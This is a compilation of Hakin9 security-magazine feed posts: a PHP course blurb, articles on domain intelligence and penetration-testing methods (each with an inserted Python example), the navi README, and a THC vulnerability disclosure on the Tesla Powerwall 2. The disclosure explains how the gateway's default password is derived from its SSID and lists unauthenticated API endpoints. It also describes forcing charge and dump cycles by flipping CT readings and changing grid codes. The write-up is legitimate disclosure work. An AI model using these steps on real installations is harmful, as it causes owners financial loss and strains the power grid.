In this course, we start with concepts of PHP and what it has to offer. We learn how to structure applications and consider fundamentals when designing an application. You need to have a solid base to later on ensure everything is nice and secured, and it is helpful to know how developers work if you want to review their code. We also look at various good practices in regard to PHP coding and benchmark them against the top 10 threats to web applications to see how to effectively build bullet proof applications. You don't want to get stuck with code vulnerable to one of the OWASP Top 10, such as a simple SQL injection, do you? Finally, we get exposed to various tools and techniques that can be used to enable us to analyze and fix a majority of our PHP applications. 

What will this course give you? 

  • It will get you up and running with the key concepts of PHP development and application protection. 
  • It will give you practical implementation of secure PHP development using different tools and techniques. 
  • You will master the art of detecting, mitigating, fixing, and preventing defects in PHP applications.
  • You will also learn the tricks to countering scanners in PHP development. 

You will be able to confidently speak about: 

  • Fundamentals of PHP development.
  • Various application protection techniques.
  • Using various tools to analyse and defend against attacks to applications. 
  • Fixing known bugs in PHP applications. 

Tools you’ll get familiar with: 

  • Github
  • Notepad++ / Visual studio IDE
  • OWASP SKF
  • Phar-based static analysis tools 
  • XAMPP/WAMPP/LAMPP


The post SQL Injection attacks - using information schema to retrieve data [FREE COURSE CONTENT] appeared first on Hakin9 - IT Security Magazine.


Domain Intelligence for Proactive Threat Defense by Jonathan Zhang


According to the World Intellectual Property Organization (WIPO), the volume of cybersquatting cases grew by as much as 12% in 2018, the highest in years. The introduction of more than 1,200 new gTLDs was believed to have widened cybersquatters’ playing field. The implementation of stricter data privacy regulations was also said to have a role in the rise in the number of anonymously registered domain names that potentially allowed cybersquatters to evade trademark owners’ prying eyes.

Meanwhile, the number of phishing attacks seen in the second quarter of 2019 eclipsed the volumes seen in the past three quarters. The total number of phishing sites detected by the Anti-Phishing Working Group (APWG) from April to June 2019 reached 182,465. Things take a turn for the worse when phishing attacks lead to a massive data breach, as we’ve seen happen several times. To date, each data breach incident can cost a company an average of US$3.92 million.

Organizations also faced 34% more DNS attacks compared to 2018, which could cost them an average of US$1.07 million in remediation on top of business downtime.

All that said, companies cannot rely on merely reacting to attacks; they need to ensure proactive protection by ensuring the security of their entire domain infrastructure. Whether they rely on an in-house or a third-party security provider, they can benefit from domain intelligence.

Improving Cybersecurity Posture with Data Enrichment

Organizations that have an in-house IT security team can safeguard their domains by:

  • Empowering security operations center (SOC) staff: Domain intelligence can provide SOCs with context and possibly attribution for the threat data they analyze. Using a reverse WHOIS API, for instance, allows them to conduct in-depth investigations into who owns a domain listed as an indicator of compromise (IoC) for an attack. Knowing who is behind the domain points to a specific adversary the team needs to monitor for future attempts, reducing the chance of compromise.
  • Enriching security information and event management (SIEM) solutions: Organizations can integrate domain intelligence into their SIEM solutions for faster threat identification. In short, security teams can feed IP, URL, and other domain data into their solutions so these can easily compare IoCs with log information to pinpoint and block all potential threat sources before these can do harm. This approach improves alert triage, but only if the domain intelligence source is accurate and regularly updated.
  • Enabling penetration testing with a security orchestration, automation, and response (SOAR) platform: Not all organizations have the resources to conduct penetration testing, which is a leading cause of cyber-attack unpreparedness. Most do not have the experts to perform such tests given the current IT talent shortage. That should not be an issue these days, however, with the introduction of SOAR platforms that can automate activities such as asset discovery scans, classification activities, and target prioritization, making it possible for security teams to operationalize their penetration testing efforts.
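The SIEM enrichment and reverse-WHOIS pivot described above, as an added example that is not part of the article or of any vendor's product: proxy log lines are matched against an indicator feed that carries WHOIS-style context, each hit is tagged with the domain's age, and the registrant contact is used to find related domains. The feed entries, log lines, addresses and dates are all constructed sample data, and the log format is an assumption.

```python
"""Enrich proxy log lines with a domain-intelligence (WHOIS-style) feed.

Added example, not from the article: it matches the hostnames seen in logs
against an indicator feed, attaches registrar / creation-date / registrant
context to each hit, and pivots on the registrant the way a reverse-WHOIS
lookup would. Every feed entry, log line, address and date below is
constructed sample data.
"""
import re
from datetime import date

# Constructed indicator feed: domain -> WHOIS-style context.
IOC_FEED = {
    "login-example-bank.test": {
        "registrar": "Example Registrar Ltd", "created": "2019-06-02",
        "registrant": "actor1@mail.example.test", "source": "phishing-report-42"},
    "invoice-portal.test": {
        "registrar": "Example Registrar Ltd", "created": "2019-06-05",
        "registrant": "actor1@mail.example.test", "source": "phishing-report-42"},
    "cdn-updates.test": {
        "registrar": "Other Registrar Inc", "created": "2018-01-15",
        "registrant": "REDACTED FOR PRIVACY", "source": "c2-feed-7"},
}

# Constructed proxy log lines: "<timestamp> <client> <method> <url> <status>".
SAMPLE_LOGS = [
    "2019-07-01T10:01:02Z 10.0.0.5 GET http://login-example-bank.test/verify 200",
    "2019-07-01T10:02:10Z 10.0.0.7 GET https://www.example.test/ 200",
    "2019-07-01T10:03:44Z 10.0.0.9 CONNECT cdn-updates.test:443 200",
    "2019-07-01T10:05:00Z 10.0.0.5 GET https://secure.login-example-bank.test/login 302",
    "malformed line that the parser must skip",
]

LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>\S+)\s+(?P<url>\S+)\s+(?P<status>\d+)$")
HOST_RE = re.compile(r"^(?:[a-z]+://)?([^/:]+)")


def parse_line(line):
    """Return a dict for a well-formed log line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host = HOST_RE.match(m["url"]).group(1).lower()
    return {"ts": m["ts"], "src": m["src"], "host": host, "status": int(m["status"])}


def feed_match(host, feed):
    """Match the host or any parent domain (sub.a.test -> a.test) against the feed."""
    labels = host.split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in feed:
            return candidate
    return None


def domain_age_days(created, as_of):
    year, month, day = (int(p) for p in created.split("-"))
    return (as_of - date(year, month, day)).days


def enrich(lines, feed=IOC_FEED, as_of=date(2019, 7, 1), young_days=30):
    """Attach feed context to every log line whose host matches an indicator."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ioc = feed_match(rec["host"], feed)
        if ioc is None:
            continue
        ctx = feed[ioc]
        age = domain_age_days(ctx["created"], as_of)
        hits.append({**rec, "ioc": ioc, "registrar": ctx["registrar"],
                     "registrant": ctx["registrant"], "source": ctx["source"],
                     "domain_age_days": age, "newly_registered": age <= young_days})
    return hits


def pivot_by_registrant(hit, feed=IOC_FEED):
    """Reverse-WHOIS style pivot: other feed domains registered by the same contact."""
    who = hit["registrant"]
    if "REDACTED" in who.upper():  # anonymised record, nothing to pivot on
        return []
    return sorted(d for d, ctx in feed.items() if ctx["registrant"] == who and d != hit["ioc"])


if __name__ == "__main__":
    for hit in enrich(SAMPLE_LOGS):
        flag = "NEW-DOMAIN " if hit["newly_registered"] else ""
        print(f"{hit['ts']} {hit['src']} -> {hit['host']} [{hit['source']}] {flag}"
              f"age={hit['domain_age_days']}d related={pivot_by_registrant(hit)}")
```

The parent-domain match is what makes the subdomain hit work; the age check is the "newly registered domain" signal many triage rules key on, and the pivot deliberately gives up on privacy-redacted records rather than grouping every anonymised domain together.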

Those that rely on third-party service providers to beef up their cyber defense can also benefit from domain intelligence.

  • Managed security service providers (MSSPs): An efficient MSSP should be able to detect and prevent an attack before it can do damage, as well as identify the actors behind an intrusion attempt from the email addresses, domains, and other information in WHOIS records. Learning about a domain’s reputation, for instance, allows blocking access from a disreputable domain that could have ties to an ongoing attack, thus stopping it in its tracks.
  • Managed detection and response (MDR) service providers: MDR teams can rely on WHOIS and DNS databases to answer questions relevant to their role, such as:

- Are the communications that reach client networks coming from potentially spoofed email addresses?

- Are specific categories of top-level domain (TLD) names often misused for fraud?

- Are there patterns among domain records that may help uncover large-scale criminal networks?

Cybercriminals are continuously enhancing tried-and-tested tools and tactics to inflict damage, and organizations with weak or inadequate defenses often end up as their victims. Companies need to enrich their threat intelligence to block threats at the source and make sure their domains are not being used for malicious activities.


About the Author

Jonathan Zhang is the founder and CEO of Threat Intelligence Platform (TIP), a data, tool, and API provider that specializes in automated threat detection, security analysis, and threat intelligence solutions for Fortune 1000 and cybersecurity companies. TIP is part of the Whois XML API family, an intelligence vendor trusted by over 50,000 clients.

The post Domain Intelligence for Proactive Threat Defense by Jonathan Zhang appeared first on Hakin9 - IT Security Magazine.

Leading Methodologies Used by a Penetration Tester by Claire Mackerras


Did you know that the number of cyber-attacks has increased substantially over the last decade? Along with this, Advanced Persistent Threats (APTs), ransomware attacks and insider threats are also becoming a part of the conversation. With the increased number of cyber-attacks in mind, corporate sectors have started paying attention to the security testing of their software applications and products.

By the end of this post, you will be aware of the leading methodologies for software security testing. But before that, if you come from a non-technical background, you should know about the professional who handles the responsibility of security testing software applications.

Some Eye-Opening Stats Regarding Cyber-Attacks:

Undoubtedly, the cyber security industry is growing continuously and rapidly. Corporate sectors are spending more and more on the resources to defend against cyber-attacks.

According to a survey result, 95% of breached records came from the government, retail, and technology industries.

According to the University of Maryland, a hacker attack takes place every 39 seconds.

64% of the companies have experienced web-based cyber-attacks, out of which 43% are small businesses.

In 2013, approximately 3,809,448 records were stolen through breaches every day, and this number had jumped by 126% by 2017.

According to last year's report, 75% of the healthcare industry was infected by malware. All the above stats prove the importance of cyber security for websites and software applications; there is no room to be lax on security.

Unlock The Responsibilities of a Professional Penetration Tester & Process of Penetration Testing:

Well, a penetration tester is a professional who takes care of all security testing concerns related to software applications. Penetration testing is one of the most recommended and widely supported techniques used by penetration testers to identify the vulnerable areas of a system.

Penetration testing involves deliberate attacks on the network to identify the weak areas that would give unauthorized users a way to attack the system and compromise its integrity. It also assists in fixing numerous security bugs and loopholes. It is therefore not only fruitful but also essential for companies to perform penetration testing to identify potential vulnerabilities and keep the security posture of their software applications tight.

Once the penetration testers identify the vulnerabilities, these can be used to demonstrate access to sensitive information. The security weaknesses uncovered during the penetration test are then delivered to the system owner along with an accurate assessment of their potential impact on the entire organization.

Effective Penetration Testing:

Now the question arises - What is ideal Penetration Testing? Well, effective penetration testing helps in evaluating the gaps in the security tools a company is using. It also helps in finding multiple attack vectors as well as misconfigurations. Apart from this, penetration testing helps in prioritizing and fixing risks and improves the overall security response time.

Furthermore, penetration testing helps in evaluating the capacity of the system to defend against sudden malicious attacks. Following are some of the most common causes of system vulnerabilities:

  • Designing Errors
  • Settings and Configuration Mismatch
  • Network connectivity
  • Human-induced error
  • Communication
  • Complexity

Significant Steps Involved in Penetration Testing:

Before I go further, let me introduce you to the significant steps in the process of penetration testing. Following are some of the vital steps involved in the leading methodologies used by a penetration tester:

  1. First of all, you need to determine the feasibility of a particular set of attack vectors.
  2. Secondly, you have to identify the higher-risk vulnerabilities that emerge from combining lower-risk vulnerabilities exploited in a specific sequence.
  3. Next, you need to figure out the vulnerabilities that are difficult to detect with automated network scanning tools.
  4. Subsequently, you need to assess the magnitude of the potential business and operational impact of successful attacks.
  5. The next important thing you need to do is provide evidence to support increased investment in security personnel and technology.

Nowadays, penetration testing is the backbone of most IT companies' security efforts. Penetration testing is spreading its wings, and its impact can be seen clearly in related areas like social engineering, web application security, and physical penetration testing.

There are many penetration testing tools that are convenient to use. These tools are not only convenient but also easy to deploy and configure. Moreover, keep in mind that the tools should follow a methodology that allows vulnerabilities to be categorized by severity, so that those needing an immediate fix stand out. Most importantly, penetration testing tools should allow automated verification of vulnerabilities to save time and reduce human error.

Popular Penetration Testing Tools:

The following are some of the popular Penetration testing tools that are supported by numerous Penetration testers around the world:

  • Acunetix
  • Aircrack-ng
  • Cain & Abel
  • Ettercap
  • John the Ripper
  • Metasploit
  • Nessus
  • Kismet
  • Wireshark

How to Perform Penetration Testing?

Now the question arises - How to perform Penetration Testing? Well, there are three main approaches to performing penetration testing, i.e., Manual Penetration Testing, Automated Penetration Testing, and Manual + Automated Penetration Testing. Let us discuss each strategy one by one so that you can better understand each of them.

Manual Penetration Testing: 

Manual penetration testing follows a standard approach in which various activities are performed in sequence. The following are some of the activities, in order:

  • Penetration testing planning
  • Reconnaissance
  • Vulnerability Analysis
  • Exploitation
  • External attacks
  • Internal attacks
  • Post Exploitation
  • Reporting

Automated Penetration Testing:

Automated penetration testing is performed using several automated testing tools. The following are some of the most used tools during automated penetration testing:

  • NMap
  • Nessus
  • Metasploit
  • Wireshark
  • Veracode 

Manual + Automated Penetration Testing:

This is the combination of manual and automated penetration testing. The purpose of this approach is to make sure the testing is useful, monitored, and precise.

Methodologies of Penetration Testing:

We can describe the methods of Penetration Testing on the basis of testing approaches. Following are some of the methods of Penetration Testing:

Black Box Penetration Testing: 

Unlike gray-box penetration testing, only high-level information is made available to the tester in black-box penetration testing. In black-box penetration testing, the tester has zero internal knowledge of the target system. It determines the system vulnerabilities that can be exploited from outside the network. Black-box penetration testing relies on a dynamic analysis approach. Furthermore, these testers also need to be proficient in developing their own map of the target on the basis of their observations.

Gray Box Penetration Testing:

Gray box Penetration testing only makes limited information available to the tester to attack the system externally. Gray box testing is one level up from black-box testing. Moreover, Gray-box penetration testers are aware of the network’s internals, including design and architecture. The purpose of gray-box penetration testing is to provide a more focused network security assessment.

White Box Penetration Testing:

In this method of penetration testing, the tester has complete access to and in-depth knowledge of the system that needs to be tested. This methodology is exceptionally fruitful when it comes to extensive penetration testing.

It is also known as clear-box, open-box, auxiliary, and logic-driven testing. The challenge of white-box testing is sorting through the massive amount of data available to identify potential points of weakness, which makes it the most time-consuming type of penetration testing.

Unlike black-box and gray-box penetration testing, white-box penetration testers can perform static code analysis, so they need to be familiar with source code analyzers, debuggers, and the other tools required for this sort of testing. Furthermore, white-box penetration testing offers a complete assessment of both internal and external vulnerabilities, which makes it the best option for comprehensive testing.

Some Other Penetration Testing Methodologies:

Data Collection: 

No doubt, there are several methods you can use to gather data about the target system. Web page source code analysis is also a sound technique for gathering more information about the target system's data, software, and plugin versions. Apart from this, there are free tools and services you can use to get information about the database, table names, software versions, and hardware used by third-party plugins.

Vulnerability Assessment:

Based on the data collected, security vulnerabilities can be identified quickly. This assists penetration testers in launching attacks using the identified entry points in the system.

Actual Exploit:

This is the most critical step. It demands special skills and techniques to configure attacks on the targeted system. Experienced and veteran testers can use their skills and experience to launch an attack on the system network.

Result Analysis and Report Development:

Once the penetration tests are done, the next step involves the preparation of detailed reports with corrective actions. All the identified vulnerabilities and recommended remediation methods need to be listed in this report. Moreover, you can produce the vulnerability report in the following formats:

  • HTML
  • XML
  • MS Word
  • PDF

About the Author:

Claire Mackerras is a Senior QA Engineer & Editor associated with Bugraptors, a certified software testing company with extensive experience as a third-party testing vendor in the US. She is passionate about writing on technological trends for manual & automation software testing. She likes to share her knowledge with readers who are interested in exploring testing tactics and trends.

 

The post Leading Methodologies Used by a Penetration Tester by Claire Mackerras appeared first on Hakin9 - IT Security Magazine.

navi - An interactive cheatsheet tool for the command-line


navi allows you to browse through cheatsheets (that you may write yourself or download from maintainers) and execute commands, with argument values prompted to you.

How to run that command again?
Oh, it's not in my shell history
Geez, it's almost what I wanted but I need to change some args

Installation

Using Homebrew or Linuxbrew

You can use Homebrew or Linuxbrew to install navi:

brew install denisidoro/tools/navi

Using git

Alternatively, you can git clone this repository:

git clone --depth 1 https://github.com/denisidoro/navi /opt/navi
cd /opt/navi

# to install in your $PATH
sudo make install 

# to install in an arbitrary folder
./scripts/install /some/path

# install fzf
# refer to https://github.com/junegunn/fzf

Using oh-my-zsh

Make sure that your oh-my-zsh $ZSH_CUSTOM directory is configured, then clone navi into the plugins directory.

plugins_dir="$ZSH_CUSTOM/plugins"
mkdir -p "$plugins_dir"
cd "$plugins_dir"
git clone https://github.com/denisidoro/navi

Then, add it to the oh-my-zsh plugin array to automatically enable the zsh widget:

plugins=(docker tmux fzf navi)

Lastly, reload your zshrc or spawn a new terminal to load navi. Once this is done, you should be able to use it as a shell widget with no additional setup.

Please note that when installing as an oh-my-zsh plugin, navi will not be available as a command. If you also want to be able to run the command interactively, you will need to do one of the following:

  • Install it to /usr/bin/local (via sudo make install)
  • Manually set $PATH so that navi can be found.

You can manually update your path by adding a line like this in your .zshrc:

export PATH=$PATH:"$ZSH_CUSTOM/plugins/navi"

And verify that it works by running which navi after reloading your configuration.

Upgrading

navi is being actively developed and you might want to upgrade it once in a while. Please follow the instructions below depending on the installation method used:

# brew
brew upgrade navi

# git or oh-my-zsh
cd "$(navi home)"
git pull

Usage

By simply running navi you will be prompted with the default cheatsheets.

Preventing execution

If you run navi --print, the selected snippet won't be executed. It will be printed to stdout instead.

Pre-filtering

If you run navi query <cmd>, the results will be pre-filtered.

Searching online repositories

If you run navi search <cmd>, navi will try to download cheatsheets from online repositories as well.

Please note that these cheatsheets aren't curated by navi's maintainers and should be taken with a grain of salt. If you're not sure about executing these snippets, make sure to check the preview window or use the --print option.

Shell widget

You can use navi as a widget for your shell. This way, your history is correctly populated and you can edit the command as you wish before executing it.

In order to use it, add this line to your .bashrc-like file:

# bash
source "$(navi widget bash)"

# zsh
source "$(navi widget zsh)"

# fish
source (navi widget fish)

By default, Ctrl+G is assigned to launching navi. If you want to change the keybinding, replace the argument of bind or bindkey in the widget file.

If you want a widget for other shells, please upvote this issue.

More options

Please refer to navi --help for more details.

Trying out online

If you don't have access to bash at the moment and you want to live preview navi, head to this playground. It'll start a docker container with instructions for you to install and use the tool. Note: login required.

Motivation

The main objectives are:

  • to increase discoverability, by finding snippets given keywords or descriptions;
  • to prevent you from running auxiliary commands, copying the result into the clipboard and then pasting into the original command;
  • to easily share one-liners with others so that they don't need to figure out how to write the commands;
  • to improve terminal usage as a whole.

Sure, you can find autocompleters out there for all your favorite commands. However, they are very specific and each one may offer a different learning curve.

Or you can launch a browser and search for instructions on Google, but that takes some time.

navi, on the other hand, intends to be a general purpose platform for bookmarking any snippet at a very low cost.

Cheatsheets

Using your own custom cheatsheets

In this case, you need to pass a :-separated list of directories which contain .cheat files:

navi --path "/folder/with/cheats"

Alternatively, you can set an environment variable in your .bashrc-like file:

export NAVI_PATH="/folder/with/cheats:/another/folder"

Submitting cheatsheets

Feel free to fork this project and open a PR for me to include your contributions.

Cheatsheet syntax

Cheatsheets are described in .cheat files.

Syntax overview

  • lines starting with % should contain tags which will be added to any command in a given file;
  • lines starting with # should be descriptions of commands;
  • lines starting with $ should contain commands that generate a list of possible values for a given argument;
  • all the other non-empty lines are considered as executable commands.

For example, this is a valid .cheat file:

% git, code

# Change branch
git checkout <branch>

$ branch: git branch | awk '{print $NF}'

Variables

The interface prompts for variable names inside angle brackets (e.g. <branch>).

Variable names should only include alphanumeric characters and _.

The command for generating possible inputs can refer to other variables:

# If you select 2 for x, the possible values of y will be 12 and 22
echo <x> <y>

$ x: echo -e '1\n2\n3'
$ y: echo -e "$((x+10))\n$((x+20))"

Table formatting

You can pick a specific column of a selection and set the number of lines considered as headers:

# This will pick the 3rd column and use the first line as header
docker rmi <image_id>

$ image_id: docker images --- --column 3 --headers 1
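The cheatsheet syntax, variables and table formatting described above, as an added example that is not navi's own code: a small Python reader for .cheat files that lists every command a file would offer, the order in which its variables must be prompted (a generator that refers to another variable needs that one first), which inputs have no generator and are free text, and which generator commands navi would run on your machine to build the suggestion lists. That last point is the practical reason for such a script: cheatsheets pulled by navi search are not curated, and both the snippet and its $ generators execute locally. The sample cheatsheet is constructed from the examples on this page; treating any bare identifier in a generator command that matches a variable name as a dependency is a heuristic of this script, not navi's rule.

```python
"""Read navi .cheat files and report what each snippet would run and prompt for.

Added example, not part of navi: it implements the syntax described above
(% tags, # descriptions, $ argument generators with optional --- options,
everything else a command with <var> placeholders). The sample cheat below
is constructed from the page's examples.
"""
import re

SAMPLE_CHEAT = """\
% git, code

# Change branch
git checkout <branch>

$ branch: git branch | awk '{print $NF}'

# If you select 2 for x, the possible values of y will be 12 and 22
echo <x> <y>

$ x: echo -e '1\\n2\\n3'
$ y: echo -e "$((x+10))\\n$((x+20))"

# Remove a docker image by id
docker rmi <image_id>

$ image_id: docker images --- --column 3 --headers 1
"""

PLACEHOLDER_RE = re.compile(r"<([A-Za-z0-9_]+)>")
WORD_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def parse_cheat(text):
    """Return {'tags': [...], 'snippets': [...], 'generators': {name: {...}}}."""
    tags, snippets, generators = [], [], {}
    description = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("%"):
            tags.extend(t.strip() for t in line[1:].split(",") if t.strip())
        elif line.startswith("#"):
            description = line[1:].strip()  # applies to the next command line
        elif line.startswith("$"):
            name, _, rest = line[1:].partition(":")
            command, _, options = rest.partition("---")
            generators[name.strip()] = {"command": command.strip(), "options": options.strip()}
        else:
            snippets.append({"description": description, "command": line,
                             "variables": PLACEHOLDER_RE.findall(line)})
            description = None
    return {"tags": tags, "snippets": snippets, "generators": generators}


def generator_dependencies(name, generators):
    """Heuristic (this script's, not navi's): other variable names used in the generator."""
    words = set(WORD_RE.findall(generators[name]["command"]))
    return {w for w in words if w in generators and w != name}


def resolution_order(variables, generators):
    """Prompt order such that a generator's inputs are known before it runs."""
    order, done = [], set()

    def visit(var, stack):
        if var in done:
            return
        if var in stack:
            raise ValueError(f"cyclic variable reference through {var}")
        if var in generators:
            for dep in sorted(generator_dependencies(var, generators)):
                visit(dep, stack | {var})
        done.add(var)
        order.append(var)

    for var in variables:
        visit(var, set())
    return order


def review(text):
    """Per snippet: the command, prompt order, free-text inputs, and generators that will run."""
    parsed = parse_cheat(text)
    gens = parsed["generators"]
    report = []
    for snip in parsed["snippets"]:
        order = resolution_order(snip["variables"], gens)
        report.append({"command": snip["command"], "description": snip["description"],
                       "prompt_order": order,
                       "free_text_inputs": [v for v in order if v not in gens],
                       "generator_commands": [gens[v]["command"] for v in order if v in gens]})
    return report


if __name__ == "__main__":
    for entry in review(SAMPLE_CHEAT):
        print(f"{entry['description']}: {entry['command']}")
        print(f"  prompts {entry['prompt_order']}, runs {entry['generator_commands']}")
```

Everything in generator_commands runs in your shell as soon as navi builds the suggestion list, so that column is the one to read before trusting a downloaded cheatsheet; the --print option only stops the final snippet from executing.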

List customization

Lists can be stylized with the $FZF_DEFAULT_OPTS environment variable. This way, you can change the color scheme, for example.

In addition:

  • the --fzf-overrides option allows you to hide columns, for example
  • the --col-widths option allows you to limit column widths

Please refer to navi --help for more details.

Related projects

There are many similar projects out there (bro, eg, cheat.sh, tldr, cmdmenu, cheat, beavr, how2 and howdoi, to name a few).

Most of them provide excellent cheatsheet repositories, but lack a nice UI and argument suggestions.

In any case, navi has the option to search for some of these repositories.


Support the project and author: https://github.com/denisidoro/navi#motivation

The post navi - An interactive cheatsheet tool for the command-line appeared first on Hakin9 - IT Security Magazine.

TESLA PowerWall 2 Security Shenanigans


The Tesla Powerwall 2 (PW) is a battery storage solution. It is often installed in combination with photovoltaic solar panels (PVs). The PW will store the PV generated power during daytime when the sun is shining and make the power available to the house when the sun is not shining. The PW can store up to 13.5kW of electric power and load/unload it at 5kW (7kW peak US / 5kW peak in the UK).

Twitter: @hackerschoice
eMail: root at thc.org

EXECUTIVE SUMMARY

  1. GUI wide open.
  2. Default password on WiFi and management interface
  3. Attacker can cause financial damage to consumer
  4. Attacker can dump entire PW Load into the grid at once
  5. Attacker can oscillate between CHARGING and DUMPING (microseconds, the poor sub-station!)
  6. Attacker can change grid codes.

Components: The Gateway (GW) consists of a Single Board Computer (SBC) and an energy meter (Neurio).

The SBC is custom built by WinSystems Inc and is called the G400.

The Neurio energy meter is the W1 module. It connects to the SBC via WiFi.

RS-485 is used to communicate between the SBC and the battery. Up to 10 batteries can be connected to a single GW (daisy-chain).

The research is based on GUI firmware 1.10.2 and internal firmware Tesla-0.0.7

The GW can be configured to connect via Ethernet, GSM and Wifi to the Internet/Tesla-HQ. The Internet connection is used for firmware updates and for Tesla to fiddle with your PW. Tesla has unrestricted and remote management capability.

Download: tesla-pw-gw.jpg
Download: tesla-pw-gw-front.jpg

22/tcp open  ssh (SSH-2.0-OpenSSH_7.2)
80/tcp open  http (PW UI running here)
8306/tcp  open  Welcome to Model S hec-updater ONLINE Built for Package Version: 17.23.0 (up 28754.018395333s)
29810/tcp open  unknown
MAC ETH  Address: 00:01:45:07:31:17 (Winsystems)
MAC WiFi Address: 00:23:A7:AF:de:ad (Redpine Signals)

PW-UI Management Interface

The PW-GW’s management interface is accessible via WiFi. The WiFi network name is TEG-XYZ with XYZ being the last 3 digits of the PW’s serial number. TEG stands for ‘Tesla Energy Gateway’.

The password for the WiFi is the serial number. The serial number looks like this:

ST<YY><L>0001<XYZ>

YY is the build year and L is the revision number. I’ve seen revisions with letters D through to I. For example ST17H0001789 would be a valid password for the Tesla PW on a WiFi network with SSID TEG-789.

The Management Interface (PW-UI) is accessible at http://192.168.91.1. The webpage will ask for a password which is again the serial number. The same management interface is accessible via the ethernet connection.

The password can not be changed. It is not possible to disable the WiFi network. I accessed mine from 50m away. It's broadcasting its SSID as well (yeha!).

THC says: Fix it! No default passwords. Do not have the WiFi accessible except during installation.


CT fun:

The Tesla PW comes with two CT sensors. These are A/C current clamps that are installed around the LIVE wire of the incoming GRID line (house LIVE) and the LIVE wire of the SOLAR PV.

The Tesla PW uses these clamps to determine when to charge the PW from the Solar PV. E.g. the PW goes into charging mode when the Solar PV generate more electricity than the house uses.

The CT sensors have to be installed with the correct orientation; otherwise the GW gets an inverted (negative) reading, e.g. the GW thinks the house is exporting electricity rather than importing from the grid. Electricians do make mistakes and Tesla has this amazing feature to invert the reading in software if the installer fitted the CT clamps the wrong way around (sweet!)

In the PW-UI Management Interface this is possible by selecting the "Flip" check-box next to the CT Sensor name on the CT configuration page.


CHARGE & KILL THE GRID

Let's flip the reading of the GRID CT Clamp in the PW-UI. Let's assume the CT Clamp reading is +1kW (e.g. that the house is drawing +1kW from the grid). After flipping the reading the GW receives -1kW and believes that the energy is being exported to the grid. The PW immediately goes into charging mode and starts charging the PW. This causes more power to be drawn from the grid (say +2kW). The CT Clamp reports this to the GW as -2kW (remember, it's flipped) and the PW ramps up charging...and draws even more power from the grid..and so on and so on...until it's charging at full load of +5kW. All this happens within microseconds. WARNING: The battery gets hot very quickly and the fans start spinning at full power

There are other fun CT Clamp Flip Combinations. Another combination forces the PW to dump its entire charge back into the grid - all at once of course.

The Problem:

  1. Here in the UK we have night rate and day rate for electricity. Night rate is usually 300% cheaper and the PW is charged by night. Now an attacker can trick the PW to charge at day-rate and dump the load into the grid at night-rate, causing a financial loss to the consumer.
  2. The default password is crap. It's 2019. This should not happen. An attacker can access multiple Tesla PWs at the same time. Does anyone know how the grid feels if all Tesla PWs start dumping their load back into the grid? I can also quickly change between CHARGING and DUMPING. It's really quick. We are talking sub-second switching between CHARGING and DUMPING. How does the grid feel about me oscillating this and who will die first, the PW or the sub-station?
  3. It is little understood that Tesla can do all this from their HQ. By this I mean any attacker or employee with the right access to Tesla HQ can put all PWs worldwide into CHARGING and DUMPING and oscillate between these two very quickly (sub-second).

THC says: Err, do not cause any harm


So much more to research

The PW-UI management interface has lots of other features which we have not explored (yet). It's possible to play with the grid codes such as forcing the PW into 60Hz or lowering/increasing the allowed export amperage or voltage. Someone really should take a look at this....

Imagine what somebody could do with access to the PW GW single board computer...and thus being able to send raw commands via the RS-485 bus to the batteries....

Looks like the ssh version might be vulnerable to username enumeration. Also somebody should check serial console and vga/keyboard on the PCB.


Automate your attack

The PW-UI is a web-based interface. A simple Python script can be used to trigger any type of command remotely. A lot of commands are undocumented. The best way to get a list of commands is to have the Mozilla Network Monitor running during setup and testing.


Interesting API calls

Most API calls are available without authentication. Auth is required for most API calls that write to the system. It's HTTP BASIC AUTH using the same password as the WiFi password.

GET API calls:
/api/status              # Shows start_tie, up_time, version, git_hash
/api/system_status/grid_faults
/api/system_status/soe   # Shows percentage
/api/config
/api/config/completed
/api/customer
/api/sitemaster/stop     # Stops the PW
/api/sitemaster/run      # Starts the PW
/api/customer/registration
/api/installer
/api/meters
/api/meters/aggregates  # Info about CTs and loads
/api/meters/readings
/api/networks
/api/networks/wifi_security_types
/api/operation
/api/powerwall
/api/powerwalls/status 
/api/site_info
/api/sitemaster         # Shows running, uptime, connected_to_tesla...
/api/solar
/api/status
/api/system_status/grid_faults
/api/system/testing
/api/system/update/status

POST API calls:
/api/customer/registration/legal
/api/customer/registration/skip
/api/installer
/api/login/Basic
/api/meters/{CTS ID}/invert_cts
/api/networks/default_gsm/disable
/api/operation
/api/powerwalls
/api/powerwalls/update
/api/site_info/timezone timezone: Europe/London
/api/site_info/grid_code
/api/site_info/grid_code
/api/site_info/site_name
/api/site_info/timezone
/api/system/testing
/api/system/networks/conn_tests

Example:

/api/site_info/grid_code
variable value
grid_code 50Hz_230V_1_G59:UK
region G59 21A

Do not try any of these Grid Codes (really, please do not):

AU ASS4777.2
DE VDE4105
UK GA59 21A, GA83 16A
IT CEI-021
NZ NZS47772
US: IEEE1547 Split Phase 240V 60Hz

/api/installer

Tesla Installer Account Numbers are sequential and can be retrieved with api/installer/companies. Example: Installer 1681 is ZSD Solar GmbH. This is how the installer can see your Tesla Installation and disable your tesla remotely. Good idea to change this :>

variable value
Company THC
customer_id 31337
phone 0123456789
GET api/config
GET api/customer
GET completed
GET api/logout

Hacking Environment

A list of some tips and tricks. Some parts are optional and not needed to hack the PW.

Part 1: Place the PW on its own dedicated network behind a linux router. This will allow us to capture all network traffic between the PW and the Internet.

Part 2: Run the PW-UI Wizard and write down all values. Disable GSM to prevent any further firmware upgrade and to prevent Tesla from fiddling with your PW.

Part 3: We use the web browser ‘Mozilla’. Go to “about:config" and delete the value in ‘network.http.accept-encoding’. This will make it easier to read the captured network traffic between our browser and the PW.

Part 4: In Mozilla open the Network Monitor by pressing ‘Cmd+Opt+E’ (Windows: Ctrl+Shift+E). That's all it takes these days. This will allow us to inspect every request to the PW UI and read the response.
